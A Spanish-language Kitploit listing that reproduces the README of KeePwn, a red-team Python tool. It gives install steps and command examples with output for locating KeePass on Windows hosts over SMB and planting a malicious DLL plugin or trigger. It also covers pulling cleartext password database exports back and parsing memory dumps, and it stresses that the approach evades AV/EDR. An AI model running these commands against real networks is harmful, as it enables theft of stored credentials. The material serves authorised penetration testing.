Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
KeePwn — Una herramienta de Python para automatizar el descubrimiento de KeePass y la extracción de secretos. | Kitploit
Herramientas/GitHubGitHub/orange-cyberdefense/keepwn
Descifrado de ContraseñasExplotaciónPost-ExplotaciónRed Teaming
GitHuborange-cyberdefense/keepwn

KeePwn

Una herramienta de Python para automatizar el descubrimiento de KeePass y la extracción de secretos.

Ver Repositorio
5275414hace 1 añoRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Un script en Python para ayudar a los equipos rojos a descubrir instancias de KeePass y extraer secretos.

Características

  • Descubrimiento de KeePass
    • Buscar archivos de instalación de KeePass a través del recurso compartido SMB C$.
    • Aceptar múltiples fuentes de objetivo (IP, CIDR, hostname, archivo).
    • Verificar metadatos de KeePass (versión, última hora de acceso).
    • Verificar procesos de KeePass en ejecución mediante RPC basado en Impacket.
    • Implementación multi-hilo para evitar hosts cuello de botella.
    • Exportar resultados de búsqueda a CSV.
    • Encontrar bases de datos KDBX.
  • Abuso de plugins de KeePass
    • Añadir y eliminar plugins de KeePass (ver KeeFarce Reborn) a través del recurso compartido SMB C$.
    • Recuperar exportaciones en texto plano en el host remoto.
  • Abuso de disparadores de KeePass
    • Añadir y eliminar disparadores (ver: KeeThief desde el archivo de configuración de KeePass a través del recurso compartido SMB C$.
    • Recuperar exportaciones en texto plano en el host remoto.
    • Personalizar disparadores con argumentos de línea de comandos.
  • Análisis de volcados de memoria de KeePass
    • Analizar volcados de memoria para encontrar candidatos a contraseña maestra (CVE-2023-32784).
    • Analizar volcados de memoria para encontrar la clave de cifrado.
  • Descifrado de bases de datos KeePass
    • Convertir KDBX a formatos compatibles con John y Hashcat.
    • Añadir soporte para formato KDBX 4.x.
  • Autenticación
    • Soporte de autenticación mediante hash LM/NT.
    • Soporte de autenticación Kerberos.
  • Miscelánea
    • Escribir pruebas unitarias.
    • Publicar el proyecto en PyPI .

Instalación

git clone https://github.com/Orange-Cyberdefense/KeePwn && cd KeePwn
python3 -m pip install .
KeePwn --help

O si no deseas instalar sino solo ejecutar en un virtualenv:

git clone https://github.com/Orange-Cyberdefense/KeePwn && cd KeePwn
python3 -m venv .venv
source .venv/bin/activate
python3 -m pip install -r requirements.txt
python3 KeePwn.py --help

Uso

Descubrimiento

El módulo search de KeePwn se utiliza para identificar hosts que ejecutan KeePass en tu entorno objetivo:

$ python3 KeePwn.py search -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -tf ./targets.txt

[*] Starting remote KeePass search with 5 threads

[PC01.COMPANY.LOCAL] No KeePass-related file found
[PC02.COMPANY.LOCAL] No KeePass-related file found
[PC03.COMPANY.LOCAL] Found '\\C$\Program Files\KeePass Password Safe 2\KeePass.exe' (Version: 2.57.1, LastUpdateCheck: 48 minutes ago)
[PC03.COMPANY.LOCAL] Found '\\C$\Users\jdoe\AppData\Roaming\KeePass\KeePass.config.xml'
[PC04.COMPANY.LOCAL] No KeePass-related file found
[PC05.COMPANY.LOCAL] No KeePass-related file found

Hace uso del recurso compartido C$ incorporado de Active Directory para buscar archivos relacionados con KeePass en ubicaciones predeterminadas, por lo que requiere privilegios de administrador en los objetivos.

El módulo primero buscará el archivo de configuración KeePass.config.xml en la carpeta %APPDATA%\KeePass de cada usuario, así como KeePass.exe en su ruta de instalación predeterminada (C:\Program Files\KeePass Password Safe 2). Si se encuentra un archivo de configuración pero KeePass no está instalado globalmente, KeePwn buscará instalaciones portátiles hasta --max-depth subcarpetas.

Esta técnica de búsqueda básica debería ser suficiente para determinar con precisión si KeePass se usa en una estación de trabajo o no. Además, la opción --get-process utilizará la implementación RPC de Impacket para determinar si KeePass se está ejecutando actualmente en el objetivo.

También se incluyen varias opciones de calidad de vida para permitir exportar los resultados de búsqueda a un archivo CSV, mostrar solo los objetivos donde se encuentra KeePass y ajustar el número de hilos paralelos:

$ KeePwn search -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -tf ./targets.txt --threads 4 --get-process --found-only --output keepwn_out.csv

[*] Starting remote KeePass search with 4 threads

[PC03.COMPANY.LOCAL] Found '\\C$\Program Files\KeePass Password Safe 2\KeePass.exe' (Version: 2.57.1, LastUpdateCheck: 48 minutes ago)
[PC03.COMPANY.LOCAL] Found '\\C$\Users\jdoe\AppData\Roaming\KeePass\KeePass.config.xml'
[PC03.COMPANY.LOCAL] Found running KeePass.exe process (User: COMPANY\jdoe, PID: 3820)

[+] Search results logged to keepwn_out.csv
Abuso de plugins

KeePass cuenta con un marco de plugins que puede ser abusado para cargar DLL maliciosas en el proceso de KeePass, permitiendo a atacantes con derechos de administrador exportar fácilmente la base de datos (ver: KeeFarceRebornPlugin).

El módulo plugin de KeePwn permite:

  • Listar los plugins actualmente instalados y enumerar la caché de plugins

    $ KeePwn plugin check -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL                                   
    
    [*] No path specified, searching in default locations..
    [*] Found dbBackup.plgx in folder '\\C$\Program Files\KeePass Password Safe 2\Plugins\'
    [*] Found pDhkzWQYiobXhtBEEnbo in folder '\\C$\Users\jdoe\AppData\Local\KeePass\PluginCache'
    
  • Añadir y eliminar tus plugins maliciosos

    $ KeePwn plugin add -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL --plugin KeeFarceRebornPlugin.dll  
    
    [*] No path specified, searching in default locations..
    [*] Found KeePass Plugins directory '\\C$\Program Files\KeePass Password Safe 2\Plugins\'
    [!] About to add KeeFarceRebornPlugin.dll to KeePass Plugins directory, do you want to continue? [y/n]
    > y
    [+] Plugin successfully added to KeePass, wait for next restart, poll and enjoy!
    
  • Consultar %APPDATA% en busca de exportaciones y moverlas automáticamente del host remoto al sistema de archivos local

    $ KeePwn plugin poll -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL                                  
    
    [*] Polling for database export every 5 seconds.. press CTRL+C to abort. DONE                                                                                                                                                                                
    [+] Found cleartext export '\\C$\\Users\jdoe\AppData\Roaming\export.xml'
    [+] Moved remote export to ./export.xml
    

Estas acciones se realizan a través del acceso al recurso compartido SMB C$, lo que limita la detección por parte de AV/EDR, ya que no se ejecuta ningún comando.

Abuso de disparadores

Como se describe en el artículo de @harmj0y (y posteriormente CVE-2023-24055), el sistema de disparadores de KeePass puede ser abusado para exportar la base de datos en texto plano.

El módulo trigger de KeePwn permite:

  • Verificar si un disparador malicioso llamado "export" está actualmente escrito en la configuración de KeePass

    $ KeePwn trigger check -u 'Administrator' -p 'P@$$w0rd!!' -d 'COMPANY.LOCAL' -t PC03.COMPANY.LOCAL
    
Descargar herramienta